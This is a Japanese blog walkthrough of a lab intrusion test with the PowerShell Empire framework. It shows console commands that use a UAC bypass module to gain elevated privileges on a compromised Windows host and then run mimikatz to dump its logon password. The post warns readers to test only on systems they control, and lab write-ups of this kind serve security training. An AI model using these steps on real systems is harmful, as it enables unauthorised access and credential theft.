とある親父の侵入実験【Empire：帝国の力 後編】

ここで取り上げる検証等を実施する際は、全て自分の管理している環境で検証してください。使い方、実施場所を誤ると法に触れて罰せられます。

とりあえず続きします。

前回までに、Empireで作成したbatファイルをWindowsに渡して起動。見事にリバース接続が成功した状態で終わりました。

こんな感じで、相手の情報がほぼほぼ丸見え。usernameからhostname、OSもわかってたw

次は、この端末のパスワードを奪取しようと思います。Windowsのパスワードを取ると行ったらmimikatz。このツールが有名であって尚且つ、このEmpireとの相性がいい（俺の勝手な想像w）というわけでパスワードの奪取までやってみよう！

５　パスワード奪取

上図の状態でmimikazを実行するモジュールを選択する。

　(Empire: TPESSRK3BLUPTA4G) > usemodule credentials/mimikatz/logonpasswords
　(Empire: credentials/mimikatz/logonpasswords) > info

mimikazのlogonpasswordを割り出すモジュールを呼び出したところ。今回は、特に設定を変えることなくこのまま実行

見事にエラー！！

このモジュールを動かすには、高い権限がいるっぽい（適当な意訳）

ってことでUACをbypassしてみる。

 　(Empire: credentials/mimikatz/logonpasswords) > usemodule privesc/bypassuac

ここではリスナーの指定が必須項目なのでリスナーを指定して実行。

　(Empire: privesc/bypassuac) > set Listener test
　(Empire: privesc/bypassuac) > execute
　[>] Module is not opsec safe, run? [y/N] y

実行するとJobが始まって・・・

新エージェントが追加される。

このエージェントを確認すると

２段目に新しく追加されているのが確認できる。そして、Usernameを見てみると新しく追加された方には「*」が付加されているのが確認できる。そこで、今度は新しいエージェントにインタラクトしてみる。

　(Empire: agents) > interact EBGZFMZ4EVCTBBSA

同じ端末であることは確認できるのだが一番下の項目「high_integrity」をみると０から１に変更されている。この状態で先ほど失敗したmimikazのモジュールを実行してみる。

　(Empire: EBGZFMZ4EVCTBBSA) > usemodule credentials/mimikatz/logonpasswords
　(Empire: credentials/mimikatz/logonpasswords) > execute

しばらくするとJobが始まって・・・

見事に取れましたw

Username : Victim

Password : password

６　結論

このEmpireはMetasploitに取って代わるツールではないけど、個人を狙った標的型攻撃では、とても便利なツールが用意されていて「標的型攻撃演習」というシナリオではとても便利そう。でも、使い方を間違えるととても危険なツールであることには間違いないと思った。今後もこのEmpireを使った攻撃シナリオについて検証してみたい。